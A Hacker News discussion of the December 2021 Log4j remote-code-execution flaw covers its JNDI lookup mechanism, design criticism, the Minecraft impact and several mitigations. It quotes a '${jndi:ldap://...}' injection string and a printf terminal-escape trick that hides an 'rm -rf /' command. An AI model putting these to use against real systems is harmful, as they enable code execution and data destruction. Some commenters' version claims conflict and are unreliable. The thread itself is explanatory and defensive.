Log4j RCE Found

lewisjoe · on Dec 10, 2021

To folks wondering what the issue is about, I'll give a short summary that I myself needed.

Typically a logging library has one job to do: swallow the string as if it's some black box and spit it elsewhere as per provided configurations. Log4j though, doesn't treat strings as black boxes. It inspects its contents and checks if it contains any "variables" that need to be resolved before spitting out.

Now there's a bunch of ways to interpolate "variables" into log content. For example something like "Logging from ${java:vm}" will print "Logging from Oracle JVM". I'm not sure but you get the idea.

One way to resolve a variable using a custom Java resolver is by looking it up through a remote class hosted in some LDAP server, say "${jndi:ldap://someremoteclass}" (I'm still not quite sure why LDAP comes into the picture). Turns out, by including "." in some part of the URL to this remote class, Log4j lets off its guard & simply looks up to that server and dynamically loads the class file.

The fix has introduced ways to configure an allowed set of hosts/protocols/etc and forces Log4j to go through this configuration such that these dynamic resolutions don't land on an random/evil server.

brabel · on Dec 10, 2021

These "special" strings that Log4j parse must be in the formatting string though, right?

External Strings should normally be logged as parameters, not included in the format String. For example:

    // this is ok
    log.debug("user-agent={}", userAgent);

    // this is bad
    log.debug("user-agent=" + userAgent);

Does this vulnerability still work on the first case?

EDIT: the answer is yes, just tried it myself.

smsm42 · on Dec 11, 2021

That's stunning. People are screaming about SQL injections and such for decades now, every "programming 101 for complete doofuses" course has a chapter about it in the first ten pages, we have tools upon tools to detect patterns of using untrusted data as control... And yet, one of the most popular logging toolkits in one of the most popular languages has it built in as a feature - literally using untrusted and unfiltered outside data as a pattern - and it takes until 2021 (almost 2022, happy new year!) to realize this is bad??? There were so many problems with untrusted data used as control flow, how it didn't raise any alarms before?

unclebucknasty · on Dec 11, 2021

I mean it's so inexplicably bad that it's hard to imagine it being an innocent mistake.

You have to wonder if opening a ticket for such a feature then having someone (or yourself under another account) build it in such an egregious way is a possible vector for deliberately creating such exploits.

If this feature was default enabled, then it's even more suspect. It's just such an esoteric thing.

When you factor in this kind of thing with recent revelations about backdoored NPM packages, you have to wonder if OSS is even tenable. I don't want to go all the sky is falling here, But the default model of assuming that someone's paying attention doesn't seem to cut it. It works well in most cases, but it's that 2% or 5% that's a doozy.

janto · on Dec 12, 2021

OSS definitely has a reliability and credibility problem on its hands. Codes of Conduct that prioritize belonging over, say, competence and truthfulness is not helping. We need more people like the old Linus that are more concerned with the quality of the artifact than increasing the size of a community

xpe · on Dec 15, 2021

> We need more people like the old Linus that are more concerned with the quality of the artifact than increasing the size of a community

There is a difference between (a) maintaining high code quality and review standards and (b) yelling at people and/or degrading them.

With this in mind, think through the first-order and second-order effects that happen when toxic leadership behavior is allowed, tolerated, or encouraged in an open source project.

Toxic leadership in an open source project, all other things equal, harms the project and the people.

Of course, historically, there are cases where intelligent and committed people exhibit toxic behaviors -- but this is not a pattern of behavior for us to aspire to. Quite the opposite.

I understand that many people (including software developers) struggle in interpersonal interactions. I don't demonize people when they are unaware or lack the tools to treat others with respect. But these behaviors have huge negative effects, so it reasonable and beneficial to have fair, humane codes of conduct to mitigate such negative patterns of behavior.

KarlKemp · on Dec 14, 2021

I think we need fewer people that somehow manage to mangle logic to such a degree that they blame security vulnerabilities on the willingness of some project to state that it's generally preferred to treat each other with some respect.

Linus' insults were always cringeworthy. Sometimes they may have been justified, at other times they were just needlessly hurtful and revealed some sort of weakness on his part. In any case, he always had the power to say no with just that single word.

Log4J doesn't even have a code of conduct in its source tree, though I guess Apache probably has one. You'll get a free Log4j update if you find any instances of it having an impact on the project.

xpe · on Dec 15, 2021

> Codes of Conduct that prioritize belonging over, say, competence and truthfulness is not helping.

What is your reasoning for suggesting that (i) codes of conduct are in tension with (ii) competence and truthfulness?

xpe · on Dec 15, 2021

> Codes of Conduct that prioritize belonging over, say, competence and truthfulness is not helping.

Example, please?

raxxorrax · on Dec 13, 2021

That is a pretty far out security assessment. You have the same exploits in commercial software, just security through obscurity helps because of far less usage.

unclebucknasty · on Dec 14, 2021

>That is a pretty far out security assessment

Yeah, I kind of thought that too as I was typing it, but it's so egregiously bad that I couldn't get around that conclusion.

>You have the same exploits in commercial software

Sure, virtually all software is susceptible to exploit. But, if someone were sending unsanitized strings to a database, and without using query parameters, etc., then we would all agree that's inexcusable after all of these years of knowing better.

IMO, this is in that category.

einpoklum · on Dec 12, 2021

Alexander Dumas once said:

> Une chose qui m'humilie profondément est de voir que le génie humain a des limites, quand la bêtise humaine n'en a pas.

So, never discount human stupidity :-(

SZJX · on Dec 13, 2021

Sounds quite sensationalized and the other way round tbh. Nobody 10000 years ago would have imagined how far we’ve come nowadays as a whole, while stupidity would be more likely limited by the circumstances and conditions of the time.

erk__ · on Dec 10, 2021

According to a comment here it does https://news.ycombinator.com/item?id=29506397

brabel · on Dec 10, 2021

Confirmed myself here... yes, it does :(

vincnetas · on Dec 10, 2021

wow it's like SQL injection but even when using user input as parameter it does not get sanitised. Really curious what was motivation for such behaviour.

niea_11 · on Dec 10, 2021

Here is the jira ticket that introduced the behaviour (jndi lookup) : https://issues.apache.org/jira/browse/LOG4J2-313

josefx · on Dec 10, 2021

That explains the jndi lookup, but not why variables are parsed when they are not part of the format string. That just asks for unexpected issues and exploits.

vincnetas · on Dec 10, 2021

JNDI lookup in it self is not a problem, problem is that user input is not sanitised and can include templates which can have JNDI lookup in them. I would expect user input with {} template symbols to be escaped and not evaluated.

przemelek · on Dec 10, 2021

Maybe, but still this seems as vanity feature added because "It would be really convenient"... this wasn't something what was needed, but something what was added to make life of maybe 0.1% of users little bit easier. My guess is that most of users of Log4J2 don't even know that it is able to do such magic, and would be horrified knowing it. IMHO Log library should log, not do some magic stuff.

richardfey · on Dec 10, 2021

I am indeed horrified

niea_11 · on Dec 10, 2021

The method responsible for variable substitution is here [1].

There are other lookup mechanisms, (didn't check them all) but they only retrieve environment/static values (this one [2] for example retrieves kubernetes attributes). I think the jndi one is the only one that load and execute code.

Edit : I think my understanding of the docs is incorrect so ignore the next paragraph

From the documentation [3], I have the impression that these variables should be evaluated only when loading the pattern layout configuration. But in reality they are also evaluated when formatting the final log message (log.info(...)).

I agree that the input should be sanitized but only if the formatting behavior is a bug and was not intentional.

One possible explanation for the current situation, is that developers assumed that all lookup mechanism will retrieve only static values (env variables for example).

And then another dev introduced the jndi lookup which execute code, but no one noticed the impact on the already existing behavior (evaluation variable when formatting the final msg).

Edit

1: https://github.com/apache/logging-log4j2/blob/9df31f73b62ba2...

2: https://github.com/apache/logging-log4j2/blob/c2b07e37995004...

3: https://logging.apache.org/log4j/2.x/manual/lookups.html

layer8 · on Dec 10, 2021

> I agree that the input should be sanitized but only if the formatting behavior is a bug and was not intentional.

Non-pattern arguments should not do any substitution, because otherwise developers have to jump through hoops to output strings verbatim. You don’t want "Invalid identifier: '${<some valid log4j syntax>}'" to be turned into "Invalid identifier: '<the log4j replacement>'" when the actual invalid identifier (e.g. from user input) was the "${…}" syntax. I’m surprised that log4j behaves that way still after two decades.

jcheng · on Dec 10, 2021

I was so surprised by the behavior your comment describes that I didn't believe it, but it's true. And it's not a bug, they do this on purpose!

From https://logging.apache.org/log4j/2.x/log4j-core/apidocs/org/...:

> Variable replacement works in a recursive way. Thus, if a variable value contains a variable then that variable will also be replaced.

And an example where this caused problems for someone:

https://www.tasktop.com/blog-under-construction/log4j-2-the-...

spion · on Dec 12, 2021

Recursive replacement is somewhat of a WTF yes but not really in a causitive relationship ro this vulnerability, right? The main cause is the order in which ${} variables are evaluated. They are evaluated after substitution of `{}` in the format string, instead of before. That's the key behavior problem.

A simple rule such as "If you evaluate a placeholder of type `{}` you should stop evaluating further recursively" would maintain most of existing behavior while only removing vulnerable behavior.

scottlamb · on Dec 10, 2021

> I agree that the input should be sanitized but only if the formatting behavior is a bug and was not intentional.

The behavior is fundamentally wrong as explained by layer8's comment and in the blog post jcheng linked. Apparently it was intentional, and to me that's a million times worse than if it were a bug that could just be fixed.

log4j is unsuitable for use in a way that many many people are suddenly discovering today. The log4j developers need to rethink this, and even if they do, log4j's users should still strongly consider switching to something else. Otherwise they need to audit the whole codebase for other surprising, broken, insecure design decisions not only in its present state but also on each update. I don't see how it's possible to trust the log4j developers' design sensibilities after this.

jedwidz · on Dec 16, 2021

> Apparently it was intentional, and to me that's a million times worse than if it were a bug that could just be fixed.

I've been on an 'archaeological dig' into the Log4j commit history, and sure enough, there's evidence that the formatting behavior was intentional from the outset.

My write-up is here: https://jedwidz.hashnode.dev/log4j-vulnerability-what-the-fa...

smsm42 · on Dec 11, 2021

That's way worse than that - that's like SQL server looks into your data and if it sees something that looks like SQL it executes it right there. I wonder how it took until now to find an exploit...

chrisjc · on Dec 10, 2021

Yup, log injection is something that I've been hearing a lot about recently, but I really only thought about it being able to affect systems that consume the logs. This approach is pretty ingenious.

danmur · on Dec 10, 2021

That's very surprising.

janekm · on Dec 10, 2021

Though of course "debug.log(stuffIGotFromPeer)" is also very common (and as you point out should always be avoided).

Pxtl · on Dec 10, 2021

If "debug.log(stuffIGotFromPeer)" is dangerous, then the problem is with debug.log and not my code.

Safe logging is not too high of a bar.

jhugo · on Dec 10, 2021

The point is that the first argument is the format string. debug.log("{}", stuffIGotFromPeer) should generally be safe (this bug is an example of when it isn't, though)

jameshart · on Dec 10, 2021

The fact that the first argument is interpreted as a format string even when you aren't supplying format arguments is a violation of 'principle of least surprise'. The availability of format parameters that can access environment data - let alone remotely loaded code - is a feature most people won't discover unless they go looking for it.

rixed · on Dec 11, 2021

How are varargs implemented in the JVM ABI? Is the called function even aware of how many parameters were actually passed, or does it have to rely on the format string for that?

jameshart · on Dec 11, 2021

Turned into an object[] array.

The log4j API implements a few overloads of each log method to help avoid the implicit array allocation happening in common logging cases (no args, one arg, etc).

The call site can tell if args were provided.

watwut · on Dec 11, 2021

The format string should not allow remote execution unless explicitly tuned on either.

Logging should not be the thing you have to sanitize.

smsm42 · on Dec 11, 2021

TBH, this is a huge antipattern. You have to put some context in your logs, so it must be something like "debug.log("Got from peer: {}", stuffIGotFromPeer) or something like that. You can't complain printf(stuffIGotFromPeer) is dangerous, so here is the same. But in log4j, debug.log("Got from peer: {}", stuffIGotFromPeer) is as unsafe as the other one, too! There's no way to make it safe, as I understand.

spion · on Dec 12, 2021

Don't see why not. Evaluate the `${}` stuff first, then do the `{}` substitutions.

lvh · on Dec 10, 2021

Fortunately (and for reasons I can't begin to understand), debug and info logging levels seem to be safe, but error is not. Technically better, but somehow... morally worse?

mshanu · on Dec 11, 2021

Trying to put my head around, why is this log.debug("user-agent=" + userAgent); bad?

jameshart · on Dec 11, 2021

Because the string concatenation requires allocation of a new string, which will need to be garbage collected, regardless of whether or not the log.debug actually needs it.

Using a format and args lets you call the method with only references to existing objects, no additional string needs to be allocated unless the log method actually needs to generate the string to log (and it might even be able to use streaming to output the log and never even allocate the string)

When you’re doing things like putting trace logs with all your parameters in at the top of every method call, the memory and GC pressure of generating unnecessary strings can be significant.

mshanu · on Dec 13, 2021

ok, so its only gc overhead, and no security issue with it?

ptx · on Dec 13, 2021

The first argument is code and the rest of the arguments are data, much like an SQL statement and its parameters. You could try to prove that whatever interprets the code in the first argument will never do anything dangerous no matter what it's supplied with, but then someone might add that dangerous feature later, as happened in this case.

To make it always work correctly, don't pass the data values as code. Although apparently[1] Log4j complicates this by mixing code with data even if you separate them, unless you tell it not to by saying "$m{nolookups}" instead of "%m".

[1] https://www.tasktop.com/blog-under-construction/log4j-2-the-...

jameshart · on Dec 13, 2021

No. I don’t think anybody generally expects log message parameterization to do anything like escaping or white space normalization or anything to the parameters that wouldn’t also be done to the message string.

If you are using a logger to output a message which you want to be able to parse based on delimiters, say, it would be up to you to escape any parameters you were incorporating into it to ensure they don’t confuse your parser.

ehsankia · on Dec 11, 2021

Generally, most logging frameworks have two parts, the format string, and the parameters. A good logging library will also avoid calling str()/toString() if the log isn't emitted (for example, if it's a debug log but minimum level is info).

You have something similar when building database queries, generally you should have a base template into which you insert arguments. The library generally should take care of escaping things and also preventing things like SQL injections.

jameshart · on Dec 10, 2021

Even the variable interpolation is a security risk.

If I have the ability to trigger execution of a process on some service, and one of the things it does is return me the logs form that process, it might be somewhat surprising to the host of that process that if I can pass in "${java:vm}" as input, the logs might leak information about what version of the JVM it's running...

What else might you be able to get a system to leak to you if you can control input and read log output?

spullara · on Dec 10, 2021

This is just stupid. Logging should not do any side effects except writing to the log.

NelsonMinar · on Dec 10, 2021

I agree. It reminds me a lot of XXE attacks on XML. You wouldn't expect parsing an XML file to open arbitrary network connections, would you? The spec says an XML parser should do that. A lot of parsers used to have that feature turned on by default, although I think by now most folks have wised up.

spullara · on Dec 10, 2021

For sure. Also related were all the deserialization attacks on various libraries that supported it in Java, Ruby and Python.

dikei · on Dec 10, 2021

I'm not defending Log4j, but this error can really happen to many logging libraries.

All logging libraries contain some kind of template engine as a performance optimization, in order to avoid actually generating the output string (can be costly) if logging is disabled. And template engines have always been a major source of vulnerabilities.

rixed · on Dec 11, 2021

Apparently, from recent posts on this page, the problem is not solely caused by the fact that log4j perform some substitutions from a preset map, but that it performs substitution recursively, thus interpreting again the data injected into the string, with apparently no way to escape it, which I think very few logging libraries are doing.

Imagine, you write SQL commands using the proper parametric form, such as:

> exec("select * where id=${1}", user_provided_login);

You would be right to expect the DB library to escape the string so that no SQL injection is possible. After all, isn't that the whole point of parameters over a mere

> exec('select * where id=' + user_provided_login);

?

Well, apparently log4j is doing the equivalent of treating 'user_provided_login' as legit SQL.

This is especially problematic because not only will it substitute some '${variables}' again at remote user discretion, but some '${special.forms}' can actually instruct log4j to connect anywhere, download some code, execute it, then print the output. Because that was deamed convenient to someone in the past who complained that feature was missing and submitted a patch which, because of stellar unit tests, passed the code review.

The only context I can think of where this behavior regarding recursive substitution is acceptable is text templating, away from possibly adversarial input. I believe it goes opposite to expectations when logging.

mike22 · on Dec 15, 2021

> You would be right to expect the DB library to escape the string so that no SQL injection is possible.

SQL in some (hopefully good number of) cases is much safer than that. Going with MySQL prepared statements here: parameters are not sustituted into the SQL statement string, but rather sent as seperate data packets in the wire protocol.

ninkendo · on Dec 10, 2021

Eliding the string interpolation doesn’t necessarily have to be a feature of the logging library, the language itself can have affordances for this.

For example in swift, log.debug("my name is \(expensiveCalculate(name))") doesn’t have to evaluate “expensiveCalculate(name)” unless the logger actually opts to instantiate the string (which it can skip if say, debug logging is disabled.) This is because Swift’s string interpolation is implemented as lazily-evaluated closures, and all the “debug” method has to do is tag the input as an @autoclosure and it can avoid evaluation until it actually calls the closure. No templating is needed, just native string interpolation provided by the language.

dikei · on Dec 10, 2021

I would consider a programming language's native string interpolation as a form of templating, but to each his own.

ninkendo · on Dec 10, 2021

I was specifically responding to:

> All logging libraries contain some kind of template engine as a performance optimization

This doesn't need to be the case for some languages. But also, a language's native string interpolation doesn't need to be implemented as any sort of runtime template engine in the first place, because the compiler can compose the the components of the interpolated string at compile time. This compile-time/runtime split is IMO the key differentiator here, because runtime string interpolation is much more prone to bugs/RCE (since an untrusted string may show up as your template string.)

To use an example, in swift, `f1("Some \(string) with \(vars)")` is fundamentally different than calling `f2("Some {} with {}", string, vars)`, because of the fact that such a method signature for "f2" may allow an untrusted string to show up as the first argument, which isn't possible in f1. (And no, an external string that happens to have \()'s in it will not be expanded... it has to be a string literal in the source code, which the compiler can see, for interpolation to happen.)

andrebreves · on Dec 11, 2021

It's coming to Java (soon I hope): https://openjdk.java.net/jeps/8273943

Spivak · on Dec 10, 2021

While nice this feature doesn't really exist in other programming languages that don't involve the caller unergonomically wrapping the parameter to defer evaluation.

wyager · on Dec 10, 2021

There are several ways to avoid generating log strings that don't involve sketchy ad-hoc templating. Use a language with laziness, put the string generation in a lambda expression, use a language with a good compiler and don't put side effects in your log string expression, etc.

As a matter of principle, it should also clearly not be possible for a templating engine to perform any kind of side effect. That's totally crazy.

acdha · on Dec 10, 2021

I think you’re right but also showing where a more secure design could solve it just like we’ve seen for SQL injection. The problem is that the first parameter can either be a format string or data.

If the signature was different so it only used instances of a FormatString class to get dynamic behavior, this problem would be avoided, but I’m sure a lot of people would complain about the extra typing.

What’d be really cool would be if Java supported something like this Rust lifetime hack to let that be implicit where you could disable dynamic functionality for strings created after startup.

https://polyfloyd.net/post/compile-time-prevention-of-sql-in...

andrebreves · on Dec 11, 2021

Nowadays I guess the logging methods using lambda to supply the log string fix the performance problem

CoffeeOnWrite · on Dec 10, 2021

Would you be ok with logging also checking the contents of what is passed in for sensitive data that should not be logged? (I do this and am curious if there’s a better pattern, to provide defense in depth against mistakenly logging eg secrets)

fauria · on Dec 10, 2021

> I'm still not quite sure why LDAP comes into the picture

According to https://www.blackhat.com/docs/us-16/materials/us-16-Munoz-A-... , SecurityManager is not enforced on remote class loading when using JNDI's LDAP server provider interface.

isbvhodnvemrwvn · on Dec 10, 2021

Let's be honest, barely anyone even uses SecurityManager in the real world.

jsiepkes · on Dec 10, 2021

There is even a JEP to remove the SecurityManager all together: https://openjdk.java.net/jeps/411

feurio · on Dec 10, 2021

There is even a JEP to remove the SecurityManager!

twic · on Dec 10, 2021

> Turns out, by including "." in some part of the URL to this remote class, Log4j lets off its guard & simply looks up to that server and dynamically loads the class file.

No it doesn't. That was disabled by default in 2009, and was disabled by default in every release of Java 8 or later: https://github.com/openjdk/jdk8u/commit/006e84fc77a582552e71...

Unless i am mistaken, i don't believe the attack as described by LunaSec actually works against a default-configured JVM released any time in the last decade.

movover · on Dec 10, 2021

This is my understanding of it as well. While the bug is still bad due to the fact that a JVM instance will connect to the attacker's endpoint, any JVM above 8u121 wouldn't execute the code with Java's default configuration.

It's also mentioned as part of the release notes for 8u121: https://www.oracle.com/java/technologies/javase/8u121-relnot...

Edit: Looking deeper into it; the JDK version used within the POC's GitHub, from the screenshot in that repo, is 8u20, released in 2014.

twic · on Dec 10, 2021

Aha! It's more complicated than i thought:

https://mbechler.github.io/2021/12/10/PSA_Log4Shell_JNDI_Inj...

grrrrrrreat · on Dec 10, 2021

Does this affect SL4j wrappers over log4j as well ?

exec · on Dec 10, 2021

Yes. I managed to reproduce the issue with slf4j + log4j2.

sathishv · on Dec 11, 2021

can you please share code sample? and what versions you used? i am unable to replicate with log4j 1.2.12, slf4j 1.7.6, java8-151

orgesballa · on Dec 11, 2021

Affected versions >= 2.0.0, < 2.0.11 < 1.11.10

So you are safe!

voyager1 · on Dec 16, 2021

Do you have any reference about < 1.11.10 being affected? I though versions 1.x are not affected.

creatonez · on Dec 10, 2021

This exploit is quite severe on Minecraft Java Edition. Anyone can send a chat message which exploits everyone on the server and the server itself, because every chat message is logged. It's been quite a rollercoaster over the past few hours, working out the details of how to protect members of servers, and informing players (many of whom uses modded clients that don't receive the automatic Mojang patches) of how to protect themselves. Some of the major servers like 2b2t and Mineplex have shut down, and larger servers that haven't shut down yet are pure chaos right now.

mschuster91 · on Dec 10, 2021

> Anyone can send a chat message which exploits everyone on the server and the server itself, because every chat message is logged. ... Some of the major servers like 2b2t and Mineplex have shut down, and larger servers that haven't shut down yet are pure chaos right now.

Why does this behavior remind me of the old "dcc send start keylogger 0 0 0" exploit of IRC some fifteen years ago?

creatonez · on Dec 10, 2021

For context:

> DCC SEND STARTKEYLOGGER 0 0 0 is a way to make half of the people in an irc channel disconnect. This originated when a virus used the phrase to start the key logger it came with. If you had Norton internet security, it would terminate the connection. Some older routers also crash when receiving a malformed DCC request, which DCC SEND STARTKEYLOGGER 0 0 0 is.

That's pretty wild, it was caused by hypervigilant security software apparently

bullen · on Dec 10, 2021

So is this fixed in 1.18?

creatonez · on Dec 10, 2021

The vanilla launcher will automatically patch 1.12 to 1.18, and 1.18.1 includes a specific permanent fix for it by switching to a newer Log4j version.

There is a workaround that fixes it for 1.13 to 1.18 only: Simply add `-Dlog4j2.formatMsgNoLookups=true` to your Java parameters

What about Minecraft <1.12? Well, Mojang employees have said on Twitter^1 to not use any Minecraft versions before 1.12 right now.

[1]: https://twitter.com/slicedlime/status/1469150995842310144

cesarb · on Dec 10, 2021

> The vanilla launcher will automatically patch 1.12 to 1.18

The patch seems to have been to the client-1.12.xml file, which I believe is the log4j configuration file for all client releases since 1.12, and the change seems to have been to add a {nolookups} flag to the log format (but I don't have an old copy of that file to compare and see if anything else was changed).

If I'm not wrong, this gives a simple way to make sure your copy of Minecraft is patched: just check if that file has that {nolookups} flag.

patrakov · on Dec 10, 2021

Thanks, this is the first message where I see the full instruction on where and how to apply the workaround. I was not even sure if this is something I should change in the third-party code that I run in a Docker container, and now I know it is just a change of the ENTRYPOINT or CMD line.

ginko · on Dec 10, 2021

This will be a pain for MC speedrunning where older versions are still quite popular AFAIK.

rcxdude · on Dec 10, 2021

MC speed running isn't usually done on a publically accesible server though

tetha · on Dec 10, 2021

Wouldn't this be a breakthrough for the any% glitched category? You could just load + inject a class that makes you win instantly with only one chat message! <T C-V enter> speedstrat ftw. :)

mainde · on Dec 10, 2021

Speedruners don't play on public servers I imagine?

cjensen · on Dec 10, 2021

It's in the 1.18.1 release candidate 3 which is scheduled to be fully released tomorrow.

kelnos · on Dec 10, 2021

On one hand I want to be more forgiving of this, because log4j is very old, and likely this feature was introduced well before we all had a collective understanding of how fiddly and difficult security can be, and how attackers will go to extreme effort to compromise our services.

But at the same time... c'mon. A logging framework's job is to ship strings to stdout or files or something. String interpolation should not be this complicated, flexible, whatever you want to call it. The idea that a logging framework (!) could even have an RCE makes me want to scream... the feature set that leads us to that even being possible just weeps "overengineered".

michaelt · on Dec 10, 2021

> A logging framework's job is to ship strings to stdout or files or something.

I've seen people (including here on HN) dismiss libraries as "abandoned" when they went a year without a release.

The software industry will never get bug-free, feature-complete software so long as we're selecting for the opposite.

svick · on Dec 10, 2021

How do you differentiate between "actually abandoned and probably dangerous" and "actively maintained, but updated only very rarely, because there's nothing left to do"?

HelloNurse · on Dec 10, 2021

By reputation, adoption, type of changes being made (e.g. "implemented correct alphabetical ordering with proper normalization" is less mature than "updated to latest Unicode standard, Cypro-Minoan is now allowed"), update schedules (e.g. once or twice a year right after someone opens an infrequent issue vs. once or twice a year during the maintainer's vacations), type of issues that remain open (e.g. "crashes if the description is too long", answer "use a shorter description", is less mature than "bad-looking text wrapping if the description is too long", answer "default column widths are compact, but you can customize them").

ironmagma · on Dec 10, 2021

Code is alive and there’s typically always something to do: adding tests, removing bugs, or simply paying back technical debt. If you go a full year without any releasable changes, chances are the project has been abandoned.

watwut · on Dec 11, 2021

Why would you paid back technical debt on something where you don't intend to add features into or don't have serious bugs?

This idea that it must be changing forever is literally why you can't have simple done tools. Cause they will be considered abandoned once they do that one thing.

ironmagma · on Dec 11, 2021

So that changes can be more readily introduced when they need to be. When the next CVE comes out, you want to be able to respond to it quickly and produce a fix.

No one said the interface or functionality has to be changing forever; as I said, work includes testing and refactors, and that includes removing code. Or just fixing known bugs. I don’t know many open source projects with zero bugs, do you?

watwut · on Dec 11, 2021

So, you will refactor and add tests to a small library forever? It just, does not make sense.

ironmagma · on Dec 11, 2021

If it’s a useful library, you want to be more and more certain it doesn’t have bugs, so yes, you keep adding tests. Maybe you stop when it’s clear that the library is perfect. But when has any project reached that state?

If it’s too small though, it’s probably not that useful and this doesn’t apply. It doesn’t really make sense to care about whether it was abandoned, either, because it will be so small that it doesn’t have any onboarding time and anyone can pick it up at any time.

lanstin · on Dec 10, 2021

My goal is to write servers that get uptimes more than a year. Like the old saying, peefection is reached not shem there is nothing left to add but nothing left to delete.

toyg · on Dec 11, 2021

> peefection

Unrelated, but your typo made me think that "Peerfection" would be a great name for a P2P program.

blktiger · on Dec 10, 2021

Not only that, but no release in the last year is likely to be missing fixes for security issues on any sufficiently complicated project.

aaomidi · on Dec 10, 2021

> when they went a year without a release.

Cause these libraries depend on other libraries that are probably extremely out of date at that point and have their own security vulnerabilities.

An example of a project that hasn't been dismissed as "abandoned", is https://github.com/patrickmn/go-cache because it explicitly doesnt have dependencies.

So yeah, if you have a semi-complex library, a year without a release is abandoned.

JanecekPetr · on Dec 10, 2021

No, this is about log4j2 which is kinda new (2.0.0 was released 2014). Otherwise, yeah, this is terrible, especially since the tag doesn't even have to be in the formatting string.

maxdamantus · on Dec 10, 2021

The sample in the in post is log4j1 ("org.apache.log4j" rather than "org.apache.logging.log4j"), which is why it's using:

> log.info("foo: " + bar);

rather than:

> log.info("foo: {}", bar);

But the issue also affects log4j2, and it doesn't matter which form of logging you use, since the transformation apparently happens further along in some appender, used by both versions of log4j.

Zardoz84 · on Dec 10, 2021

The post examples its :

log.info("Request User Agent:{}", userAgent);

Also, I just try with log4j1 , and I can't reproduce it. At least with the netcat trick doesn't work : https://twitter.com/thetaph1/status/1469264526214406150?s=20

maxdamantus · on Dec 10, 2021

The post has been partially updated to log4j2 [0] (the import is still log4j1, but I imagine this will be updated soon [1]).

And yes, I'm actually not sure log4j1 is vulnerable. I assumed it was because the sample code in the post was using log4j1, though the description only explicitly mentions log4j2.

[0]: https://github.com/lunasec-io/lunasec/pull/270

[1]: https://github.com/lunasec-io/lunasec/pull/277

whizzter · on Dec 10, 2021

Even if 2.x is the main culprit right now some one twitter started testing and it seems that 1.x might be exploitable as well.

cpu_ · on Dec 10, 2021

can you share a link to the tweet/source?

whizzter · on Dec 22, 2021

Nah it's long gone, however I've later read that the 1.2 series was declared deprecated long ago and after that there was an exploit for 1.2 released in 2019, not entirely sure if it was ever patched so that might've been the source.

rst · on Dec 10, 2021

The patch which apparently introduced the vulnerable code path landed in 2013 -- https://www.lunasec.io/docs/blog/log4j-zero-day/

For context, injection attacks were on the original OWASP top 10 list from 2003.

ta4873588478 · on Dec 10, 2021

Yeah this is disappointing to hear about and isn't a good look for the people involved. At the very least it should've been a separate module or an opt-in configuration parameter, who the hell needs a JNDI lookup in a log statement. If you do, do it yourself then log it. Disappointing.

wbl · on Dec 10, 2021

The Ware report is 60 years old. String formatting bugs are about 20 or 30.

adamc · on Dec 10, 2021

Isn't it from 1970? So, 51 years old.

freeqaz · on Dec 10, 2021

Here's a write up on the exploit and how to patch it. We just wrote this up and posted it a few minutes ago (before this was even on HN, lol).

https://www.lunasec.io/docs/blog/log4j-zero-day/

dang · on Dec 10, 2021

Ok, I think we can change the URL to that from the submitted URL (https://github.com/apache/logging-log4j2/pull/608), which doesn't provide much (any?) context for understanding what's being fixed there.

freeqaz · on Dec 10, 2021

Thanks, dang!

nightpool · on Dec 10, 2021

Note that the formatMsgNoLookups workaround only applies to recent versions of the log4j library, while it's still unclear how far back this bug may stretch. Other options for patching are detailed in the thread: https://github.com/apache/logging-log4j2/pull/608#issuecomme... mentions that just removing the class providing the vulnerable behavior works well, and https://github.com/Glavo/log4j-patch is a JAR that you can add to your classpath to simply override the same class.

See https://github.com/apache/logging-log4j2/pull/608#issuecomme... for more details.

LOG4J2-2109 · on Dec 10, 2021

The 'formatMsgNoLookups' property was added in version 2.10.0, per the JIRA Issue LOG4J2-2109 [1] that proposed it. Therefore the 'formatMsgNoLookups=true' mitigation strategy is available in version 2.10.0 and higher, but is no longer necessary with version 2.15.0, because it then becomes the default behavior [2][3].

If you are using a version older than 2.10.0 and cannot upgrade, your mitigation choices are:

- Modify every logging pattern layout to say %m{nolookups} instead of %m in your logging config files, see details at https://issues.apache.org/jira/browse/LOG4J2-2109

or

- Substitute a non-vulnerable or empty implementation of the class org.apache.logging.log4j.core.lookup.JndiLookup, in a way that your classloader uses your replacement instead of the vulnerable version of the class. Refer to your application's or stack's classloading documentation to understand this behavior.

[1] https://issues.apache.org/jira/browse/LOG4J2-2109 [2] https://github.com/apache/logging-log4j2/pull/607/files [3] https://issues.apache.org/jira/browse/LOG4J2-3198

freeqaz · on Dec 10, 2021

Thanks for writing up this fix. I quoted it in the post here:

https://www.lunasec.io/docs/blog/log4j-zero-day/#temporary-m...

skimania · on Dec 10, 2021

The solution of using {nolookups} on every logging pattern is only available from version 2.7 and above.

https://stackoverflow.com/a/42802636/270317

LOG4J2-2109 · on Dec 10, 2021

Confirming that this is correct: the {nolookups} option was added in v2.7 as a result of LOG4J2-905, so this mitigation is not available on versions prior to 2.7. Corroborating sources:

[4] https://issues.apache.org/jira/browse/LOG4J2-905

[5] https://logging.apache.org/log4j/2.x/changes-report.html#a2....

Checking on the viability of the classloading-based mitigations now across the versions. It seems that LOG4J-1051 was raised [6] to make the class instantiator more tolerant of missing classes, and the resulting changes were released in v2.4 and v2.7. Will check how earlier versions behave in this case.

[6] https://issues.apache.org/jira/browse/LOG4J2-1051

markhahn · on Dec 15, 2021

extirpate jndi.

personally, I'd extirpate Java too. but I'm curious: does anyone need and use jndi?

anuragrsk · on Dec 11, 2021

is log4j also has this security issue or this is only in log4j2?

beyang · on Dec 10, 2021

Thank you for this super clear and concise write-up. Used it to write up these instructions for our users and customers to patch the vulnerability across their codebase and sharing here in case it's of use/interest to others: https://twitter.com/beyang/status/1469171471784329219.

jrockway · on Dec 10, 2021

So a lot of people sound mad that the logging library is parsing the inputs, and maybe they should be, but the truly paranoid should also be aware that your terminal also parses every byte given to it (to find in-band signalling for colors, window titles, where the cursor should be, etc.). This means that if a malicious user can control log lines, they can also hide stuff if you're looking at the logs in a terminal. Something to be aware of!

hawk_ · on Dec 10, 2021

While that's an interesting vector for attack, is it realistically an issue? Terminals are run as root all the time. I would guess any mainstream ones are well reviewed to not have such exploits work. Are you aware of any actual attacks exploiting terminal parsing in the wild?

ximm · on Dec 10, 2021

Classic confusion: terminals typically run as users, but the shells in them often run as root.

I could imagine an attack like this:

printf 'rm -rf /\n\033[%iAecho "Hello World!"\n'

When executed in a terminal this looks like it generates an innocent shell script. But when piped into a file and the executed it will delete all your files.

Quekid5 · on Dec 10, 2021

I think you meant \r instead of \n immediately after the / ?

TheDong · on Dec 10, 2021

> Terminals are run as root all the time

Is it really common to run terminals as root? I can't remember the last time I did. Sure, I open a terminal as my user, and then run 'sudo bash' to get a shell as root, but the terminal is still running as my user. Were you meaning something else?

shepherdjerred · on Dec 10, 2021

